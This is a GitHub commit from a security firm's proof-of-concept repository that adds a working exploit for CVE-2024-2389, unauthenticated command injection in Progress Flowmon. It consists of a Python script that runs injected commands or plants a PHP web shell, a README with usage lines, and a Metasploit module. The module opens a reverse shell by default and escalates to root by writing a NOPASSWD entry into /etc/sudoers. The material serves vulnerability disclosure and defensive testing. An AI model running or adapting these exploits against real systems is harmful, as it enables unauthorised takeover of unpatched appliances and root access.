Add CVE-2024-2389

RhinoSecurityLabs · Apr 23, 2024 · 1f52533 · 1f52533
1 parent 3e3a7bf
commit 1f52533
Show file tree

Hide file tree

Showing 5 changed files with 173 additions and 0 deletions.
diff --git a/CVE-2024-2389/CVE-2024-2389.py b/CVE-2024-2389/CVE-2024-2389.py
@@ -0,0 +1,26 @@
+import argparse
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+parser = argparse.ArgumentParser(description='Progress Flowmon RCE')
+parser.add_argument('target', type=str, help='Target URL')
+parser.add_argument('--cmd', type=str, help='Blind command to run', required=False)
+parser.add_argument('--web-shell', action='store_true', help='Show command output')
+args = parser.parse_args()
+target = args.target
+cmd = args.cmd
+
+if args.web_shell:
+    print("[+] Writing webshell to /var/www/shtml/rce.php")
+    url = f"{target}/service.pdfs/confluence?file=userguide&lang=x&pluginPath=$(echo+PD9waHAgaWYoaXNzZXQoJF9HRVRbJ2NtZCddKSl7c3lzdGVtKCRfR0VUWydjbWQnXSk7fT8%2b+|+base64+-d+>/var/www/shtml/rce.php)"
+elif args.cmd:
+    print("[+] Running command")
+    url = f"{target}/service.pdfs/confluence?file=x&lang=x&pluginPath=$({cmd})"
+try:
+    requests.get(url, verify=False, timeout=1)  # Time it out because sometimes the command will execute but the parent process hangs
+except requests.exceptions.ReadTimeout or requests.exceptions.ConnectTimeout:
+    pass
+
+if args.web_shell:
+    print(f"[+] Visit {target}/rce.php?cmd=ls")
diff --git a/CVE-2024-2389/README.md b/CVE-2024-2389/README.md
@@ -0,0 +1,25 @@
+# CVE-2024-2389: Progress Software Flowmon Unauthenticated Command Injection
+
+## Information
+**Description:** This exploits an unauthenticated command injection in the Progress Software Flowmon application.  
+**Versions Affected:** Tested on v12.03.02  
+**Version Fixed:** 12.3.5/11.1.14  
+**Researcher:** Dave Yesland (https://x.com/daveysec)  
+**Disclosure Link:** https://rhinosecuritylabs.com/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2389  
+**Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability  
+
+## Proof-of-Concept Exploit
+### Description
+This exploit a command injection flaw in an unauthenticated PDF generator endpoint affecting PdfGenerator.php.  
+
+### Usage/Exploitation
+To run a blind command:  
+`python3 CVE-2024-2389 --cmd 'curl a.server' TARGET`
+
+To write a simple webshell:  
+`python3 CVE-2024-2389 --web-shell TARGET`  
+Then visit TARGET/rce.php  
+
+### Screenshot
+![Alt-text that shows up on hover](poc_image.png)
diff --git a/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb b/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb
@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::HttpClient
+    prepend Msf::Exploit::Remote::AutoCheck
+
+    def initialize(info = {})
+      super(
+        update_info(
+          info,
+          'Name' => 'Flowmon Unauthenticated Command Injection',
+          'Description' => %q{
+            This module exploits an unauthenticated command injection vulnerability in Progress Flowmon
+            versions before v12.03.02.
+          },
+          'Author' => [
+            'Dave Yesland with Rhino Security Labs', # Vulnerability discovery and Metasploit Module
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['CVE', 'CVE-2024-2389'],
+            ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
+          ],
+          'DisclosureDate' => '2024',
+          'Notes' => {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+          'Platform' => ['unix', 'linux'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' => [['Automatic', {}]],
+          'Privileged' => false,
+          'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp',
+            'SSL' => true,
+            'RPORT' => 443
+          },
+        )
+      )
+
+      register_options([
+        OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']),
+        OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true])
+      ])
+    end
+
+    def execute_command(cmd)
+      send_request_cgi(
+        'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),
+        'method' => 'GET',
+        'vars_get' => {
+          'file' => 'x',
+          'lang' => 'x',
+          'pluginPath' => "$(#{cmd})"
+        }
+      )
+    end
+
+    def exploit
+      print_status('Attempting to execute payload...')
+      execute_command(payload.encoded)
+    end
+
+    def on_new_session(session)
+      if datastore['PRIVESC']
+          execute_privesc_command(session)
+      else
+          print_status('Privilege escalation skipped.')
+      end
+    end
+
+    def execute_privesc_command(session)
+      print_status("Executing privilege escalation command...")
+      session.shell_command('cp /var/www/shtml/index.php /tmp/index.php.bak;')
+      session.shell_command('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
+      session.shell_command('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
+      session.shell_command('cp /tmp/index.php.bak /var/www/shtml/index.php;')
+      print_status('You should be able to use "sudo -i" for a root shell...')
+    end
+
+    def check
+      print_status("Checking if #{peer} can be exploited!")
+
+      uri = normalize_uri(target_uri.path, 'homepage/auth/login')
+      res = send_request_cgi(
+        'uri'    => uri,
+        'method' => 'GET'
+      )
+
+      unless res
+        print_error("Connection failed")
+        return CheckCode::Unknown
+      end
+
+      # Use a regular expression to extract the version number from the response
+      version = res.body.match(/\/favicon\.ico\?v=([\d.]+)/)
+
+      unless version && version[1]
+        print_error("Unable to determine the version from the favicon link.")
+        return CheckCode::Unknown
+      end
+
+      print_status("Detected version: #{version[1]}")
+
+      if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')
+        print_good("Version #{version[1]} is vulnerable.")
+        return CheckCode::Vulnerable
+      else
+        print_error("Version #{version[1]} is not vulnerable.")
+        return CheckCode::Safe
+      end
+    end
+  end
diff --git a/CVE-2024-2389/poc_image.png b/CVE-2024-2389/poc_image.png
diff --git a/README.md b/README.md
@@ -2,6 +2,7 @@
 A collection of proof-of-concept exploit scripts written by the team at Rhino Security Labs for various CVEs.
 * [CVE-2024-2449: Cross-Site Requets Forgery in Progress Kemp LoadMaster](CVE-2024-2449/)
 * [CVE-2024-2448: Authenticated Command Injection in Progress Kemp LoadMaster](CVE-2024-2448/)
+* [CVE-2024-2389: Progress Software Flowmon Unauthenticated Command Injection](CVE-2024-2389/)
 * [CVE-2024-23724: Ghost CMS Stored XSS Leading to Owner Takeover](CVE-2024-23724/)
 * [CVE-2024-1212: Unauthenticated Command Injection in Progress Kemp LoadMaster](CVE-2024-1212/)
 * [CVE-2023-47327: Silverpeas Core Space Create Function is vulnerable to Broken Access Control](CVE-2023-47327/)